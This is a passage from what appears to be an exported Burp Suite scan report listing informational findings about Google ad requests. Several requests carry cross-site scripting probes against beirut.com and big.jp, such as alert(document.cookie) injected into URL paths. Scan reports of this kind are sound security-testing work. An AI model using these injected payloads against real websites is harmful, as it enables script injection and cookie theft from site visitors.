Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.44. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990848&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969248591&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969248617&frm=0&adk=1607234649&ga_vid=1801418532.1295969249&ga_sid=1295969249&ga_hid=807060559&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=36815001&fu=0&ifi=1&dtd=101&xpc=TfA2DY7uwP&p=file%3A//

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bmwusa.com-xss-cwe-79.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGDLGwHNUQr8N6UNbXK1BiPOiZ7mA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990848&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969248591&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969248617&frm=0&adk=1607234649&ga_vid=1801418532.1295969249&ga_sid=1295969249&ga_hid=807060559&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=36815001&fu=0&ifi=1&dtd=101&xpc=TfA2DY7uwP&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.45. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922057432&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922057502&frm=1&adk=1195544698&ga_vid=1700750743.1295922058&ga_sid=1295922058&ga_hid=1241591129&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&fu=0&ifi=1&dtd=75

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CNGEtKvRyrO0GRDYBRhaMgiEUxXKuYpkHw
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922057432&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922057502&frm=1&adk=1195544698&ga_vid=1700750743.1295922058&ga_sid=1295922058&ga_hid=1241591129&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&fu=0&ifi=1&dtd=75 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 02:20:56 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4798

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CNGEtKvRyrO0GRDYBRhaMgiEUxXKuYpkHw">
...[SNIP]...
AIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtwPJzSJfjhlpvGyEX4GGmUF2T3QwQ%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CNGEtKvRyrO0GRDYBRhaMgiEUxXKuYpkHw" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNcwuhzM-TcfNOoGCmgetj9HuBpuxle4B2-WvlxqLh8qyUZDmdRABGAEgoYyRAjgAUPe51-P-_____wFgyYajh9SjgBCgAcn29-4DsgEOd3d3LmJlaXJ1dC5jb226AQk3Mjh4OTBfYXPIAQTaAXBodHRwOi8vd3d3LmJlaXJ1dC5jb20vY3NzL2JsdWUvNDQyOWUlMjUyNyUyNTNiYWxlcnQlMjUyOGRvY3VtZW50LmNvb2tpZSUyNTI5JTI1MmYlMjUyZjU5ZjhjNzE4NWM1L3NlYXJjaC1idG4uZ2lm-AEBgAIBuAIYwAIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtwPJzSJfjhlpvGyEX4GGmUF2T3QwQ%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.46. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027186&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885027175&frm=0&adk=2318622855&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=3&xpc=2EoxxgUwVL&p=http%3A//www25.big.jp

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CKvR0IblhuirURDYBRhaMgi7ObV7Sj7g2g
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH5WHj1nhGm9gE-C16VIqi6pxmdHg

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027186&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885027175&frm=0&adk=2318622855&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=3&xpc=2EoxxgUwVL&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:00:15 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4820

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKvR0IblhuirURDYBRhaMgi7ObV7Sj7g2g">
...[SNIP]...
ah71F6Zv26tJ04fDi7_EOjveA%26client%3Dca-pub-2719533347097950%26adurl%3Dhttp://network.adsmarket.com/click/jGltmI2cgpiJapiVjZuplY9icpxgoqmdjmhxxGCbfJuNkGqVY6R7nQ%253Fdp%253D!!!1935290!!!-MarioV2103260"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKvR0IblhuirURDYBRhaMgi7ObV7Sj7g2g" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-Yc3b_Y9Tba3HpeVmgeAw8nSBvDCgf8B6LSjvB3AjbcBkE4QARgBIKLxsQc4AFDvz7uM-P____8BYMmGo4fUo4AQoAGQqqnbA7IBDHd3dzI1LmJpZy5qcLoBCTcyOHg5MF9hc8gBBNoBYmh0dHA6Ly93d3cyNS5iaWcuanAvfmphbWZlNTE3JTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0VjNmVlNGEzY2ZhOC9sZWFmbm9kZSsv4AECuAIYyAKogN8WqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtyIzah71F6Zv26tJ04fDi7_EOjveA%26client%3Dca-pub-2719533347097950%26adurl%3Dhttp://network.adsmarket.com/click/jGltmI2cgpiJapiVjZuplY9icpxgoqmdjmhxxGCbfJuNkGqVY6R7nQ%253Fdp%253D!!!1935290!!!-MarioV2103260" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH5WHj1nhGm9gE-C16VIqi6pxmdHg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.47. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.ics.com%26adT%3DICS:%2BExpert%2BQt%2BConsulting%26adU%3DOpManager.ManageEngine.com%26adT%3DNetwork%2BManagement%2BSystem%26adU%3Dwww.Appro.com%26adT%3DLinux%2BClusters%26gl%3DUS&usg=AFQjCNEzDgvlH8k5AmRc-JjarKhyGvfj_g

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.48. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041997&frm=1&adk=1195544698&ga_vid=1051291716.1295922042&ga_sid=1295922042&ga_hid=160895596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&eid=36815001%2C30143102&fu=0&ifi=1&dtd=292

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CI7-pqDm2Pq7IxDYBRhaMghF7q9hat1k7g
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041997&frm=1&adk=1195544698&ga_vid=1051291716.1295922042&ga_sid=1295922042&ga_hid=160895596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&eid=36815001%2C30143102&fu=0&ifi=1&dtd=292 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 02:20:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4798

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CI7-pqDm2Pq7IxDYBRhaMghF7q9hat1k7g">
...[SNIP]...
AIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtyelRf4LQ9USrEmDGNHVYUhgQE-dg%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CI7-pqDm2Pq7IxDYBRhaMghF7q9hat1k7g" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB1H2zeDM-TcPkLcyNmgeH95jcBpuxle4Bm_DL0xmLh8qyUZC4MRABGAEgoYyRAjgAUPe51-P-_____wFgyYajh9SjgBCgAcn29-4DsgEOd3d3LmJlaXJ1dC5jb226AQk3Mjh4OTBfYXPIAQTaAXBodHRwOi8vd3d3LmJlaXJ1dC5jb20vY3NzL2JsdWUvNDQyOWUlMjUyNyUyNTNiYWxlcnQlMjUyOGRvY3VtZW50LmNvb2tpZSUyNTI5JTI1MmYlMjUyZjU5ZjhjNzE4NWM1L3NlYXJjaC1idG4uZ2lm-AEBgAIBuAIYwAIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtyelRf4LQ9USrEmDGNHVYUhgQE-dg%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.49. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3DIpswitchFT.com/Secure-File-Transfer%26adT%3DSecure%2BFTP%2BServer%26adU%3Dftp.egnyte.com/Free_Trial%26adT%3DInstant%2BFTP%2BSite%26adU%3DLinux.ittoolbox.com%26adT%3DBoot%2BMirrors%26gl%3DUS&usg=AFQjCNG2SzwXvL44L2E5tM87fwuOrWjAZg

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898358&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&fu=0&ifi=1&dtd=89&xpc=tRJFI91Fl0&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
